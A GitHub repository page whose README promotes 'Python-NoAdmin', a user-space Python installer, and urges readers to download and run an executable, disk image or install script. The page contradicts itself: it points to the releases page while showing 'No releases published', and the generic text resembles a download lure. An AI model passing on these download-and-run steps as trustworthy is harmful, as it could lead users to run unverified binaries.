Skip to content

πŸ› οΈ Bootstrap Python easily without admin access across Windows, macOS, and Linux in restricted environments. Enjoy a fully functional runtime today.

License

Notifications You must be signed in to change notification settings

el4rjoun/Python-NoAdmin

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🐍 Python-NoAdmin - Run Python Anywhere, No Admin Needed

Download Python-NoAdmin

πŸš€ Getting Started

Welcome to Python-NoAdmin! This tool lets you use Python without needing special access on your computer. It works on Windows, macOS, and Linux. Perfect for situations where you don’t have admin rights.

πŸ“₯ Download & Install

To get the latest version of Python-NoAdmin, visit this page: Download Here.

  1. Click on the link above.
  2. Look for the latest release version.
  3. Download the file that matches your operating system.
  4. Follow the instructions below for your OS.

πŸ’» Windows Installation

  1. Download the .exe file from the releases page.
  2. Once the download finishes, double-click the file to start the installer.
  3. Follow the prompts on your screen.
  4. Python will install in your user space, so no admin rights are needed.
  5. After the installation, you can find Python in your Start Menu. Open it to start using Python.

🍏 macOS Installation

  1. Download the .dmg file from the releases page.
  2. Open the downloaded file.
  3. Drag the Python-NoAdmin icon to your Applications folder.
  4. Open your Applications folder and find Python-NoAdmin.
  5. Double-click the icon to launch Python.

🐧 Linux Installation

  1. Download the .tar.gz file from the releases page.
  2. Open a terminal window.
  3. Navigate to the folder where you downloaded the file.
  4. Run the following command to extract it:
    tar -xvf Python-NoAdmin.tar.gz
    
  5. Navigate into the extracted folder:
    cd Python-NoAdmin
    
  6. Run the installer:
    ./install.sh
    
  7. Follow the on-screen instructions to complete the installation.

πŸ›  Features

  • No Admin/Sudo Access: Install Python in user space without elevated privileges.
  • Cross-Platform: Works on Windows, macOS, and Linux.
  • Portable: Easily move and use Python on different devices.
  • Ideal for Locked-Down Environments: Use Python in corporate settings, academic labs, or CI/CD pipelines where permissions are restricted.
  • User-Friendly: Simple installation process for all users, regardless of technical skill level.

πŸ“– Using Python-NoAdmin

After installation, you can start programming with Python right away.

Running a Python Script

  1. Open your command line interface (Command Prompt on Windows, Terminal on macOS/Linux).
  2. Type python to enter the Python shell.
  3. You can write Python commands directly here. To run a script, type:
    python your_script.py
    

Creating a Python Script

  1. Open a text editor of your choice.
  2. Write your Python code.
  3. Save the file with a .py extension.
  4. Run it using the command line by following the steps above.

🌐 Need Assistance?

If you run into any problems or have questions, feel free to check the following:

  • FAQ: Visit the FAQ section in the repository for common issues and solutions.
  • Issues Page: Report any bugs you encounter, so we can resolve them.
  • Community Forums: Join discussions with other users or get help from the community.

πŸ”§ Uninstallation

Windows

  1. Go to Control Panel.
  2. Select "Programs and Features."
  3. Find Python-NoAdmin in the list, right-click, and choose "Uninstall."

macOS

  1. Open Finder and go to the Applications folder.
  2. Drag Python-NoAdmin to the Trash.
  3. Empty the Trash to remove it completely.

Linux

  1. Open a terminal.
  2. Navigate to the installation directory.
  3. Run the uninstall command:
    ./uninstall.sh
    

πŸ“Œ System Requirements

  • Windows: Windows 7 or later.
  • macOS: macOS 10.12 or later.
  • Linux: Any modern distribution that supports Python.

Ensure you have enough disk space (at least 100 MB) for installation files.

πŸ”— Additional Resources

Don't forget to visit the releases page for updates. Happy coding!

About

πŸ› οΈ Bootstrap Python easily without admin access across Windows, macOS, and Linux in restricted environments. Enjoy a fully functional runtime today.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •